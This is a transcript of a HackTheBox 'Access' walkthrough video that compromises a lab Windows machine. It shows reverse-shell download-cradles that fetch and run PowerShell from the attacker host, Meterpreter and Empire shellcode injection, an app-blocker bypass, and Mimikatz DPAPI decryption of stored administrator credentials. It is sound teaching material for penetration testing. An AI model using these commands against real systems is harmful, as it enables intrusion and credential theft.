What's going on, YouTube? This is Ipsec, and we're doing Access from HackTheBox, which is a really fun box. Essentially, the box starts out with just a FTP share that has anonymous authentication. Inside it, you'll find a encrypted zip file and a Microsoft Access database. Once you pillage the Microsoft Access database, you'll find credentials to decrypt the zip file. In that zip file is a Exchange mailbox. You can read that mailbox and then get an email that contains a username password to the machine. You log into the machine, you poke around, and you find out that there's a credential stored in the DPAPI, the Data Protection API. And we can just use that credential with runas with that /savecred flag, or we can use Mimikatz and extract the credential out of the Data Protection API. So we're going to be doing both methods, so let's just jump in. Like every other box, we're going to start with the nmap with -sc for default scripts, sv, enumerate versions, OA, output all formats, put this in the nmap directory and call it access, and then the IP address, which is 10.10.10.98. This can take some time to run, so I've already ran it. Looking at the results, we have 3 ports open. FTP on port 21, and it's a Microsoft FTP server. We also have anonymous logins are allowed, and for some reason, passive mode failed. On port 23, we have telnet. It doesn't give us any other information, and this is ending with a question mark. So telnet, nmap is not sure if this is telnet or not. Just because it's port 23, nmap's assuming this is telnet. Because there's no other information, we can assume the script timed out and it couldn't pull the ban or anything. So we should open a telnet session up to this and see if it responds and what it is. Is this actually telnet, or is it just another service listening on port 23? And then finally, we have HTTP on port 80. This is a Microsoft IIS 7.5 server, which means most likely going to be Windows 2008. If this was like version 8 point something, that would be 2012, and then 10 dot something, that would be 2016. So we also have the title of Megacorp, which could be a domain name, but the very first thing I want to do is open that telnet session and poke around with this anonymous FTP. So we're going to do telnet 10.10.10.98, and then split our pane and look at this FTP. So FTP 10.10.10.98. We'll log in with anonymous and the password as anonymous as well. Do a dir, and we can see 2 directories, dir backups. We can see there's a backup.mdb file, and dir engineer. We see access control.zip. And both these files are around the same time frame, 8/23 and 8/24, both in 2018. So about 1 day difference between the 2 files. Nothing else there. We could download the files with just git commands, but when I'm dealing with anonymous FTP, I like to download everything, and I do that with wget. So wget-m, and then ftp:// the username and password, which is anonymous, and then at 10.10.10.98, and we have passive mode failed, so we have to do the flag --no-passive, and this is going to force wget to do a active mode FTP, and here we go, it is downloading everything. It will put things in the directory of the host name, so 10.10.10.98, we see that's where it saved everything to. To be a little bit more organized, I'm just going to rename that over to FTP, and we can take a look at the files. But before we do that, look at this telnet command. We have a login, so let's do anonymous, and we get login failed. So we know this is a telnet service, and there should be some type of login. So before we poke at the files, in the interest of always having some type of recon going in the background now that the telnet finished, let's open up Firefox and look at this website. So 10.10.10.98, and we see just a picture. So let's just try like /robots.txt. We see this is a 404. Look at the page source. We have out.jpg. We can save this image, make this web, and then wget to save the image. And we can just do like exif tool on out.jpg. We can see the file created time. We could try, was it I don't even think I have the steg tools on this. Just strings on out. Nothing really interesting in that directory, but I am going to do a go buster. So -u for URL, HTTP 10.10.10.98 -w for word list, user share word list, dir buster directory list 2.3 medium. Let that go, and then let's poke at these files. So we have a MDB file and a zip file. I know what zips are, so I'm going to poke at that first. So let's go and engineer, try unzipping this, and we get unsupported compression method 99. So let's try like 7-zip. So 7-zip X, and then enter password. I'm just going to try the password of password, and we get a failure. So let's try 7-zip-H, and I'm going to do L to list the contents of the archive, and then SLT to show technical information. So 7-zip, L, SLT. And what I'm trying to find is how this was encrypted. And we have this as AES-256 deflate. And again, file dates, but this tells me that I can run, I think it's zip2john. And then we run that against the file name. We can potentially crack this. So let's just put this to a file, access control.hash. Did that go? Yep. It did try to extract that PST file, but because we didn't have the password, it is 0. So that's the other thing the 7-zip-L did, is it told us the file name in this zip archive. So let's go and look at that MDB file. So go into backups. We can do a file against backup.mdb to identify what it is. And it's a Microsoft Access database. So I'm going to use a tool called mdb-sql and mdb-tables. If you don't have these, I think you just do apt install MDBTools. MDBTools. Yep, this is a file, so just install this package and you'll get the tools I'm about to use. So, actually, before we do MDB, let's do strings on this file. And let's see if there's any plain text in here. So I'm just trying to identify if this is going to be encrypted or not. Let's see. We have a lot of text right here. More text I can read. Add personnel, delete personnel. So this looks like stuff actually in a database. So I'm going to assume this is not encrypted. So what I'm going to do is a strings -n8, and that's going to get rid of anything that's not 8 characters. So all these are going to be getting rid of. Then we can do sort-u. Save this to, we'll try word list. Well, go here. And then we'll try cracking that PST file with, the zip file with John, using the word list from that MDB. So we'll do John access control.hash, then -- word list equals word list. I should name that file something different because that is confusing. This goes here. So if we name this anything else, that's where it would go. But run this, and we can see it did crack it with access for you at security. And if that was already in your pot file, John's not going to show it. You have to do it with a -- show. And -- show doesn't like it when you specify it with the word list. So you just get rid of that. And we see it here. So we could unzip this now just using that strings to create a word list. So 7zx access control.zip, paste the password, and it was successful. But if we wanted to get it without using John and going through this MDB information, we can do mdb-sql on backup.mdb, and then we can list tables, and then with this tool you just type go, and that is going to terminate the command. So we can see all the different tables in this database. We can also just run mdb-tables on backup.mdb, and it tells us the same thing. So we can see template ex, finger vein, etc. So I'm going to do for I in MDB tables, and then specify backup.mdb, and what that's going to do is print out every table. So now we can do mdb-export on every single table, and we probably have to have some type of flag. So let's see. Oh, backup.mdb, and then the table. There we go. So what I forgot to do is specify the MDB file name. So MDB export file name, and then $I is going to be the table name. And that just outputted everything to the screen, which I don't like. So let's make the tables and modify this command to write into tables and then the table name. So now if we go into tables, we have everything outputted, and we can pick which table we want to look at. So the first thing I'm going to do is a du-s on everything to get the file size, and we can sort -n, reverse, we'll just do a wc-l to get a line count on everything, and then do a sort -n to tell it numbers, and we can just ignore everything that is just one line, because that's just going to be a blank file, just going to tell the titles of all the rows. So let's see. Out of those, what do we have that's interesting? Auth user is pretty interesting. So if we cat this, and we can see ID, username, password, status, last login. So we see admin, engineer, then this password again, which we know already goes to the zip, and then backup admin. So let's go and unzip this. GoBuster hasn't found anything. So / engineer. And we could also probably try each of these in that telnet window to try to get a login, but I just want to see what this PST was. So we have already extracted it. The command was again 7zx access control, and then paste the password in. If we look at this PST file, we can't really read it. If we do exif tool access control.pst file, we can see it's a Microsoft Outlook email folder. Kali has a tool called readPST, so we can use that against this. And then we do a ls again, and we see it converted this PST file into an mbox file. So if we less this, we can start reading the emails out of this. So we see the email was from John at Megacorp to security at Access Control Systems. And we see, hey, the password for the security account has been changed to Access Controller. Please ensure this is passed on to your engineers. Regards, John. So we got a username and password. And let's see. Let's grep for CC, I think that was. Mbox. Look at this again. Copy this. Echo security. That's just so it's going to be in my history. So if I do like Control R, then type 4 capital C, I can see what the password is. But let's telnet to 10.10.10.98, And then we'll have to wait for the login prompt, which does take a little bit. We got a login prompt, so we can log in with security, and then copy access controller. Let's paste this in. Crap. I need to hit enter first. Paste in the password, and we get on the box. If we do a whoami, we are access security. We can do IP config. We're indeed on the box. Hostname is access. So let's do a dir. Let's go into desktop. And we just have the user.txt. So the first thing I'm going to do is see if I can get to a better shell. So let's test if PowerShell is working. So I'll do PowerShell whoami, and it does run. So let's set up Nishang. So let's make a directory, www, and then let's copy opt Nishang, and then shells invoke PowerShell tcp.ps1, and we'll call this, we'll just do nishang.ps1. Edit this, and let's make this run as soon as we execute it. So take this invoke PowerShell TCP reverse line, put it at the bottom, and then put our information. So reverse, let's do if config eat 0, not eat 0, ton 0. And that's 10.10.10.10.14.3. So put that for our IP address, and then change the port to, let's do 9001. Okay. So python-m, simple HTTP server, and then nclvnp 9001. Go back to telnet, and let's do, I can't do backspaces, PowerShell, and then double quote iex, new object, net.webclient, download string, HTTP 10.10.10.14. Crap. Let's copy this. It's 10.10.14.3. And let's copy this again because, yeah, we have to. I really hate not being able to backspace. 10.10.14.3, port 8000, and then nishang.ps1. Okay. Run that. And we have it hitting the web server, and then we get a shell. So now I can do backspace, and we can do any PowerShell command we want. Another thing I like to do once I get in the box is run a script called JAWS. That's just another Windows enumeration tool. So let's go to opt JAWS get pull, just see if there's any updates. There are not. So cp opt JAWS jaws-enum.ps1. And then let's do iex new object net.webclient download string HTTP 10.10.14.3 8000 jaws-enum.ps1. And of course, I don't make any typos when I'm allowed to make typos. So run this. And this is not in the www folder. So move jaws-enum www and run this again. This script does take a little bit of time, so I'm going to fast forward the video so we're not just sitting here waiting for like 30-45 seconds. So it has finished, and while this was running, I did want to check something else, and that is going to be like the IIS web server route to see if we can potentially drop a script into the IIS web server as a current user. If that's like an ASPX script, then go hit it, have that web server return a shell to us, and then potentially do like rotten potato to privesc. So that's something we're going to check right after we look at the results of this. So let us search. So at the very beginning, we have it outputting what it is. 2008 R2 standard. It is AMD 64. we have the current users. We have administrator, engineer, guest, and security. Networking information we already looked at. ERP information, netstat. Firewall, we do have the firewall is enabled. And here it is outputting information from the firewall. Host file contents, processes. So this is interesting. C:\Windows system32 login.cmd. Let's just do a terminal for notes. Rename this. So we definitely want to look at this file. Here is our Nishang output, or Nishang process. We have scheduled tasks. And we may want to take a more thorough look at this if we don't see anything, but there are a lot of tasks to look at. Services, again, take a closer look at this if we don't find anything else. Installed programs. We do have .NET 4. Hotfixes. We see the hotfixes were applied right around the time all the files were created, which is when this box was created, so chances are we're not intended to look for some type of missed patch in like a Windows just general priv-esque, because the machine creator updated this box just before it got released. Program files, nothing. Program files 86. FP sensor, that's different. I don't think that's a standard thing, so definitely look at that directory. Files with full control and modify access. YawCam. I don't know what YawCam is. Stream. Temperature logs. Let's try update.html and that thing. So let's do update.html. And that is a 404 error. If we take off view source, look more like that. So this is not going to be the web directory for IIS. We can try /2/stream, but GoBuster would have seen /2, so I know that's not going to be there. I mistyped stream. So not sure exactly what this is. It's not related to IIS at first glance. Maybe if we do create a thing in our host file and make this access.htb or something, maybe there's virtual host routing and that directs us to this directory, but just a thought right now. We do have a D drive, which is odd. Unquoted service paths, none. Recent documents, nothing. Interesting files, again, that YawCam keeps coming up. 10 less modified files, nothing too interesting there, other than Mimikatz. Cached files, and if you're on a box like working, this would be really interesting, but for the lab, seeing someone upload Mimikatz and run it, not interesting. And we do have stored credentials, a domain password for access/administrator. So at the end of the video, we'll go into how to extract this, but the key thing to know is if you do, I think it's cmd key/list, that's essentially what that's running. And we can see there is a saved password and the, I think it's DPAPI. I forget what that stands for. Maybe like Domain Protected API. It's where Windows has its key store to store passwords. So we'll go and decrypt this because we can as a user, because this is our current profile. So let's take a look at exactly where this is. But before you do that, I do want to double check the permissions on the web server. So let's go into inetpub, www.root dir. Let's just do echo please subscribe to test. And we can't write that, and we don't have write permissions to any file. So that's a lost cause. So if we poked around the system a lot, the intended thing to do was to go into users, public, desktop, And then you see this ZK Access 3.5 security system. And maybe you poked around program files, you could see it installed, and Googling would show this exists. I forget or don't know exactly how you're supposed to intend to find this, other than just going into the public desktop. But if we do a type on this, maybe get content. Oh, it's got spaces in the name. Get content. Paste. We can see a portion of this shortcut. LNK is short for shortcut. It's a link. And we can see it's running run as access administrator / savecred. But if we wanted to actually extract a link, we can do that with Powershell. So let's do wscript is equal to new object com object wscript.shell, and then we'll do shortcut is equal to get child item. I don't feel like typing that, so I'm just going to do star.link. So if we look at shortcut, it's just going to be pointed to that file. So we can do, now that we have that com object created with the first command we ran, we can reference that com object. And then if we do create shortcut, it's not actually going to create it. If we specify something that already exists, it will just print all the information. So we can see the full name. This is going to be the path of the shortcut. We can see the arguments, which is /user access administrator, savecred, and then running the program access.exe. We can see the location, the target path, which is run as, and then the working directory. So I wonder if we, maybe at the end of the video, we'll go poke and see if there was any hints to hint at it being, or hint at the shortcut being created in the public's desktop. But for now, let's just do run as /user access administrator /save cred, and then we can do who am I? Let's do run as /user access administrator /save cred. Who am I to the file test? And we may want to specify C:\users public desktop test. And that did not work. Run as /user access administrator /save cred, and we'll just do a PowerShell reverse shell to see if we're executing. So PowerShell ix new object. We need a quote here. I can't do this quote. I'd really hate, maybe it's an escape. Maybe this will work. ix new object net.web client download string http 10.10.14.3 port 8000, and let's do 9002.ps1. We can't do the Nishang thing again because it's directing to port 9001, which is already being used. So let's do www cp Nishang to 9002.ps1. Edit this, and then let's do port 9002. nc lvnp 9002. And we can do this run as. Did not work. So let's see, the string starting. Let's just try run as PowerShell. Who am I? Is that going to error? No, it's not. So let's do PowerShell and then try triple quotes. ix new object. And we end that. Hit 9002, but didn't hit here. let me try this just one last time with a escaped quote to make sure I did this correctly. I don't know if I escaped it on the other end. So let's paste, escape, end. Hit, and we got nothing. So what I'm going to do is let's convert this command into base64 for Windows. Okay. Kill this listener real quick. V. We can just do echo-n. We want to paste this. And that looks good. So we're going to pipe this to iConvert to code UTF-16 little endian, because that's what Windows is. And something screwed up my terminal. Okay, pipe this. iConvert to code UTF-16 little endian base64 -w0. Windows does everything in UTF that format or encoding. So we have to change this string to this encoding before we base64 it. But this will let us to do a command, run as user access administrator savecred PowerShell encoded command paste. Okay. And there we go. So converting it to base64 made it so we didn't have to worry about all those annoying quotation marks. And we got a shell as administrator. So we do cd / users administrator dir desktop. We can see root.txt. Let's see. If we go into security, dir desktop, nothing there. Dir documents. Huh. I'm not sure if there's a hint going to public. That's just something I guess you have to try. But let's get rid of that and let's pretend that we wanted to get the administrator's password. So what we're going to do is Mimikatz them. So let's, what do we want to do? How do we want to get Mimikatz? Do I have Mimikatz? ls downloads Mimikatz. I do not. So let's go and download some cats. Mimikatz GitHub. And I could probably just use the one on Kali, but chances are that's not going to be as up to date. So for releases, download this, save file, go into www, move, downloads Mimikatz trunk. Then we can do 7zx to extract it. And we want x64 mimikatz.exe. So now we can go back to our shell and let's save this. So new object, net.web client, download file, HTTP 10.10.14.3, port 8000, mimikatz.exe, and then we'll call this mimikatz.exe. Looks good. Got it. Downloaded. And doesn't want to execute. I always forget how to execute a file just from PowerShell. I guess we can just do it from that telnet session. So telnet 10.10.14.3. That's my box, 10.10.10.98. I thought it was .backslash. That's going to bother me. Security. Password is... Oh, I had it somewhere. We had notes to go look at this file. So we definitely will do that after this. We want to go .john. Is there a john.pot? ls? Yes, there is. Cat john.pot hash and password. Paste. Security. Paste. Security. Paste backspace. Closed. Did I copy that wrong? Oh no, that was just the zip password. Engineer cat access control dot mbox grep for capital A, for capital C, security account. Here we go. Here's the password. Security, paste. Okay, we wanted to look at Windows System 32 login.cmd, type c:\/ System 32 login.cmd. This is just for the telnet server, so nothing interesting there. We wanted to go into where we downloaded Mimikatz, public desktop, dir. We downloaded Mimikatz here, didn't we? I wonder if antivirus removed it. New object, download file. Maybe that's why I couldn't execute it. dir. We may not have write access here. cd security desktop. Okay. We didn't have write access to the file and I didn't see an error message, so I assumed the file was there. Yeah. So that's how you execute it. I was not going crazy. Program Mimikatz failed to execute. This program is blocked by group policy. Let's just try moving it to a Windows directory. So app blocker bypass list. Let's go here. Should be a list file somewhere. Scripts? Nope. D, no. Ah, this one, generic app blocker bypasses.md. So let's do it in Windows System 32 spool drivers color. So let's copy it there and see if it works. Copy mimikatz.exe, Windows System 32 drivers, spool drivers color. Spool drivers color. Go into this directory. And we have Mimikatz, mimikatz.exe. We still get an error message. So let's just go in Meterpreter and run it that way. So opt unicorn, Python, unicorn.py. Let's do Windows Meterpreter, reverse HTTPS 10.10.14.3. 9003 should be open. Okay, so let's copy PowerShell attack to HTTP boxes access www. Call this msf.ps1, and then copy unicorn.rc to HTTP boxes access, and then msf console -r unicorn. And then let's go where notes is, and we want to do that base64 thing again. So, what is it? Echo-n. Did I do this in this terminal? Echo-n. Nope. Echo-n. IEX new object net.web client download string HTTP 10.10.14.3 8000 msf.ps1. Okay, I convert to code UTF-16 little endian base64W0. Okay. Copy that. Metasploit is listening. Powershell, EncodedCommand, paste. No hits. We got msf.ps1. We see a bunch of stuff, but no hit. Dub less msf.ps1. That is the unicorn output. Huh. So while that goes, let's try a backup plan. Opt-empire. I'm going to reset my database because I don't know what's in my database right now. Reset.sh. Okay, let's do listeners. Use listener HTTP. Set host HTTP 10.10.14.3. We'll do, I think 9004. I think MSF is 9003. So set this. Set bind IP 10.10.14.3. Set port to 9004. Info. That is good. Execute this. Back. We want to do launcher, PowerShell on the HTTP listener. Copy this and kind of do the same thing, because we still don't have a shell. So go back to this tab, the empire.ps1. I think I pasted that. I did. Okay. Go back here, change a command to empire.ps1. Or actually, we can just pipe this or execute this straight from a PowerShell window here. So paste this in. We got Empire. Go here. And we'd have a hit. So let's do interact. I wonder if we go back, use interact, there we go. And then we want to inject shellcode, HTTP. I have to go back again. Forgot to set up my interpreter listener, so let's do listeners again. Use listener. Then we want to specify interpreter. Do info, set host, HTTP 10.10.14.3, 9003. That is where our interpreter session is listening. Set port 9003. Execute. Now we can go back, interact, and then inject shellcode, interpreter, and then specify nothing. Do info. The payload is already set to reverse HTTPS. So let's execute this. Hit it. And we injected shellcode. Jobs. Not getting anything back. Exit this. MSF const. Let's do MSF DB run. I like doing msfdb run because this starts the database if it's not started, then starts MSF console. So let's do handler, let's do -h, specify 10.10.14.3 -p 9003, and then -lowercase p, we'll do, what is it, Windows interpreter reverse HTTP. So we started that handler. Let's just change our payload to be reverse HTTP execute. So we task the agent to run, hit, and we got a session back. So I'm not sure what was going on with my unicorn, but we finally got here. So we can do sessions-i1, load Kiwi, which is Mimikatz, and we loaded x86 on 64, which is not ideal. So let's migrate into a 64-bit process. I just see this cmd.exe, PID 1760, 64-bit. So we can finally begin now that we've migrated. So we can do Kiwi command, and we just got straight interpreter now. And we got to do a single quote and then a double quote because this is weird. I hate how Mimikatz handles arguments. But DPAPI, and then kill that with a double quote, single quote. So the single quotes pass everything in one argument, and then DPAPI has like, let's see if I can explain this. So you run Mimikatz, and then you get arguments. So we could do like, everyone knows like privilege, I think escalate, maybe it's elevate, and then sec URL or privilege debug, and then sec URL SA logon passwords. So this is running Mimikatz. And then by default, it runs both these commands like they were separated with a colon. So if we did this, that's how things would normally happen. But if securlsa was not put in quotes, and we had to do like /user please subscribe, then what Mimikatz would do would be it would run this command, run securlsa, and then run the command /user please subscribe, which doesn't exist. That's an argument to this function. So that's why we put the double quotes there. And then because of how we're piping it from Meterpreter, you have to wrap everything in single quotes. So you do single quotes, function argument, and that's how it works. So hopefully that made sense. So if we run this, we can see the various things we can do. I'd highly recommend doing like a Google on DPAPI and then Harmjoy. Generally anything Windows related or Active Directory, etc. Just put the term and then Harmjoy in it, and then read everything on his blog. So this is going to take us through doing what I'm about to do. So read that and then you'll understand. So ls, and then we want to do users, security, app data. What we have to do is pull the file that contains our master key. So ls users security app data. Okay, so app data, and then we want roaming Microsoft protect. And this is the SSID of our user. So let's add this in our notes. So let's go in that directory because Meterpreter is telling us that's a directory. Because I was just doing ls. CD. There we go. Then we can do dir And we can see 2 files. Since I know this box was created in 2018, I'm going to assume this is the correct file, but we can try decrypting this as well because I don't know exactly what this is. It was created 2 days ago. So this box has been online for 2 days, hasn't been reset. So we want to run pwd. Let's run that kiwi command DPAPI master key. We got to specify an in file. So in this slash file name and an error message. We're not supposed to get that error message. Let's do search module. Do I have it here? I guess I have to go back. Search module, Mimikatz. Does this have it? Mimikatz. Command. We got this stir, so that's probably going to require us to have administrator privileges or something. Use module. Info. I wonder if there's a more verbose info. Because this isn't going to work because it's going to require us to be admin. So agent, let's do this, set command, answer. Let's just see if this runs. No, we need to be in elevated context. So that won't work. And this isn't working. Let's see. pwd. We're in that directory. Kiwi cmd cd. Okay. And our interpreter is in this directory as well. So let's just try /in. We need single double DPAPI master key in, and then paste this. Mismatch on quotes. And maybe it's working. It's taking a while. And it looks like that even errored out. Let's just download this file. So if we download it, and I wonder if our interpreter just got killed by AV or something. Back, interact, because we should be able to download that file. Let's do inject shellcode, run. Okay, it executed a shellcode. Let's see if we get another session. We do. Session-i2, cd, go back in that directory. And one of the best things for AV evasion is just exfilling the files and running them on your own equipment. And that's what we're going to be doing. So if you want to do like SecURL SA, you would just, hold on. I'll finish that thought in a second. BG, sessions-i1, 2. Okay, so if you wanted to do like the SecURL SA, you would just dump the memory of lsas.exe and then exfil that dump back to yourself, and then you can Mimikatz that dump. So the best way of running Mimikatz on computers without getting detected is not to run Mimikatz at all, just grab the files at once. So do a dir git. Let's grab both of these files so we can see what that second one is. I think it's download, not git. We can do this one as well. Did I CD'd? Download 0 star. Okay. download 4-star. I think I fat fingered a backspace, so didn't copy a backspace. So we downloaded those files. We will also need another file. So let's just grab that. We don't want credhist. We want, what is it? Credentials, I think. And we want this 51 file. Okay. So we got all the files here. Let's just make a directory SMB, move them all in SMB. And then if config, eth0, I'm going to be 172.16.10.182. Let's do SMB server. And if you don't have SMB server, you can do like mpacket-SMB server. I think that's the default one. SMB server.py, SMB to support. And we want to specify the share name. So let's call this please subscribe. And then the share path, which will just be our current working directory. So now I can go on a Windows box and grab those files and Meterpreter. So let's go / 172.16.10.182. And I want to specify the directory as please subscribe. Copy these. I also want Meterpreter. Before I do Meterpreter, I want to set Defender status to off. So I go in Defender, AV, manage settings, turn that off. Okay. HackTheBox. I copy Meterpreter, so www. Not Meterpreter. I think I kept saying that. It's Mimikatz. Into SMB. And then copy this here. Okay, so now we got Mimikatz. We got all the files. So let's see. These were the master key files. And then this is the credential. If we try opening this in something, we see it's just text. If we try opening this in something, same thing. So we don't get anything out of those files. So what we do, DPAPI, and then master key /in. Before we do that, let's just run the command cd. We see Mimikatz is in desktop, so we can do DPAPI master key in, and then paste. So we see information out of this. Doesn't really get any doesn't really get anything useful because it can't decrypt this file. To decrypt the file, we need to give it the SID of the user, which we put in our notes. So copy this. And this is probably small. Let's do properties. 28 should be fine. That's probably big. 20. That's good. Okay, so we gave it the SID, and then we also got to give it the password, which we have on the mailbox. So FTP engineer control mbox, and that was a grep for C. There we go. As you can see, it would help if we took notes, so we didn't have to keep going back and forth through all these files. Paste the password, and now we can see the master key with password is this. So what that allows us to do is do another DP API call. So do this against, what is it? Not credhist. Cred. There we go. I was looking for credentials, but it's cred. /in. And then we gotta copy that file name. So let's grab this, rename, copy, paste. And let's see. Maybe it wasn't that file. Credhist. Crashed. So let's run this again. First we have to extract the master key, so DPAPI, and then master key /in. We grab the file name. We gotta get the SID. Should just put everything in a notepad file in case we crash this again. Okay, let's go. Notes, copy SID. Okay, password. Oh man. And the password is here. Paste. Let's copy, notepad, paste. Okay, we have the key. So let's do DPAPI, cred, in, and let's go for this file. And that's a failure. So we're doing the file 44B33. Let's go back to interpreter. ls, we want to go up a bit. So we're doing it against the newer one. Let's try that old file, 0792. So let's exit Mimikatz completely, so you know we're not like tainting memory by doing both those files in the same session. We can change this one to be not 44, but 07. Okay. Paste this in. And we got a new key. So let's do DPAPI, cred, in, and then hopefully the very last time. Copy this, paste, there we go. So now we got the new credential. It is 55 access security at Megacorp for administrator. So we can copy this, go back here, and then telnet 10.10.10.98, log in with administrator, and then paste. And we get straight in as administrator. So that is how to do the box through either finding that shortcut or finding the DP API. And what does that stand for? What does DP API stand for? Microsoft, probably like data protected API. Yeah, data protection API. So, okay. We got all that done. Hope you guys enjoyed the video. Take care, and I will see you all next week.